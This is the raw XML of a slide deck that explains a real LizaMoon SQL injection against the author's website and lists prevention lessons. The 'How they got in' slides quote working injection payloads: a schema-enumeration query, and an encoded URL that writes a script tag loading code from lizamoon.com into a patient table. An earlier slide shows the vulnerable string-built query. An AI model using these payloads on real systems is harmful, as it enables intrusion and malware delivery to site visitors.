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7" r:id="rId4"/>
    <p:sldId id="268" r:id="rId5"/>
    <p:sldId id="269" r:id="rId6"/>
    <p:sldId id="270" r:id="rId7"/>
    <p:sldId id="271" r:id="rId8"/>
    <p:sldId id="27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FBB9E-D24C-4E43-B7BE-FAD821DFC2DD}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>5/03/2013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450C8-7E57-4684-8484-A1B0BEAAE20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13949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FBB9E-D24C-4E43-B7BE-FAD821DFC2DD}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>5/03/2013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450C8-7E57-4684-8484-A1B0BEAAE20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65923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FBB9E-D24C-4E43-B7BE-FAD821DFC2DD}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>5/03/2013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450C8-7E57-4684-8484-A1B0BEAAE20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79401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FBB9E-D24C-4E43-B7BE-FAD821DFC2DD}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>5/03/2013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450C8-7E57-4684-8484-A1B0BEAAE20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89221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FBB9E-D24C-4E43-B7BE-FAD821DFC2DD}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>5/03/2013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450C8-7E57-4684-8484-A1B0BEAAE20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839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FBB9E-D24C-4E43-B7BE-FAD821DFC2DD}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>5/03/2013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450C8-7E57-4684-8484-A1B0BEAAE20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89112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FBB9E-D24C-4E43-B7BE-FAD821DFC2DD}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>5/03/2013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450C8-7E57-4684-8484-A1B0BEAAE20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34458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FBB9E-D24C-4E43-B7BE-FAD821DFC2DD}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>5/03/2013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450C8-7E57-4684-8484-A1B0BEAAE20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86935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FBB9E-D24C-4E43-B7BE-FAD821DFC2DD}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>5/03/2013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450C8-7E57-4684-8484-A1B0BEAAE20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868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FBB9E-D24C-4E43-B7BE-FAD821DFC2DD}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>5/03/2013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450C8-7E57-4684-8484-A1B0BEAAE20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05300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FBB9E-D24C-4E43-B7BE-FAD821DFC2DD}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>5/03/2013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450C8-7E57-4684-8484-A1B0BEAAE20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81472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FBB9E-D24C-4E43-B7BE-FAD821DFC2DD}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>5/03/2013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450C8-7E57-4684-8484-A1B0BEAAE20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10984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ixwiz.net/techtips/sql-injection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March 2011 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>LizaMoon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>SQL Injection Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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dirty="0" smtClean="0"/>
              <a:t>Lessons Learnt From a Close Call And How to Protect Your Site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>http://www.petermessenger.com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92891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was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>LizaMoon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Method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Automated SQL Injection Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Targeted old or poorly written, insecure websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Added strings to database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Aim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Redirects user to malware – fake virus scanning website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Result</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>1.5 million URLs were affected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65303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is SQL Injection?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SQL injection is done by passing in text to your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> statement that you were not expecting.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.unixwiz.net/techtips/sql-injection.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Allows hackers to get access to your database and potentially gain confidential information or just do malicious damage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55086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 real world example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Website written 8+ years ago</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Has a combo box at the top of the page with language selection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Language selection can also be passed in a request parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>Ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>ExerciseSearch.aspx?Lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>=English</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty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2924944"/>
            <a:ext cx="3676650" cy="147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9489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Poor Coding Practice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dirty="0" smtClean="0"/>
              <a:t>Combo box was being populated via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> call</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>String.Format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>("Select Lang, Code1 From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>Tbl_Exercise_Languages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> Where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>LangStatus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>=1 Or Lang='{0}'", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>LangSelected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>This is POOR PRACTICE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>SQL calls should also be parameterized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>SQL inputs should always be validated before being run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>In my defence this was then only time I did this, all other calls were done properly, as this was added a last minute thing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/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33079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How they got in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AU" dirty="0" smtClean="0"/>
              <a:t>The automated program, passes in for the request parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>English’Select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>Column_Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>Table_Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> From INFORMATION_SCHEMA.COLUMNS Where DATA_TYPE In ('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>nvarchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>','</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>nchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>','</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>char','text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>'); Print’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>So you then have two </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> scripts running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Select Lang, Code1 From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>Tbl_Exercise_Languages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> Where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>LangStatus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>=1 Or Lang='English’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>Column_Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>Table_Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> From INFORMATION_SCHEMA.COLUMNS Where DATA_TYPE In ('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>nvarchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>','</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>nchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>','</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>char','text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Print’’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Monitor traffic back, and your have now know every text column and table in the entire database.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68562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How they got in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AU" dirty="0" smtClean="0"/>
              <a:t>Example of them updating database</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>http://www.physiotherapyexercises.com/ExerciseSearch.aspx?Lang=English1'+update+Tbl_Patients+set+PatientLastName=cast(PatientLastName+as+varchar(8000))+cast(char(60)+char(47)+char(116)+char(105)+char(116)+char(108)+char(101)+char(62)+char(60)+char(115)+char(99)+char(114)+char(105)+char(112)+char(116)+char(32)+char(115)+char(114)+char(99)+char(61)+char(104)+char(116)+char(116)+char(112)+char(58)+char(47)+char(47)+char(108)+char(105)+char(122)+char(97)+char(109)+char(111)+char(111)+char(110)+char(46)+char(99)+char(111)+char(109)+char(47)+char(117)+char(114)+char(46)+char(112)+char(104)+char(112)+char(62)+char(60)+char(47)+char(115)+char(99)+char(114)+char(105)+char(112)+char(116)+char(62)+as+varchar(8000))--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950164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Lessons Learnt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AU" dirty="0" smtClean="0"/>
              <a:t>Don’t write SQL scripts on the fly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Always use stored procedures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Always use parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Perform validation on anything from the user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Think about limiting what client facing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> account can do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Think about some evil bastard may corrupt what you do.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Use Microsoft’s protection provided</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>http://www.microsoft.com/downloads/en/details.aspx?FamilyID=f4cd231b-7e06-445b-bec7-343e5884e651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626973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1139</TotalTime>
  <Words>481</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show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March 2011 LizaMoon  SQL Injection Attack</vt:lpstr>
      <vt:lpstr>What was LizaMoon</vt:lpstr>
      <vt:lpstr>What is SQL Injection?</vt:lpstr>
      <vt:lpstr>A real world example</vt:lpstr>
      <vt:lpstr>Poor Coding Practice</vt:lpstr>
      <vt:lpstr>How they got in</vt:lpstr>
      <vt:lpstr>How they got in </vt:lpstr>
      <vt:lpstr>Lessons Learnt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Apps for Windows Phone 7</dc:title>
  <dc:creator>Peter</dc:creator>
  <cp:lastModifiedBy>Peter</cp:lastModifiedBy>
  <cp:revision>45</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-04-02T11:03:56Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-03-04T20:30:37Z</dcterms:modified>
</cp:coreProperties>
</file>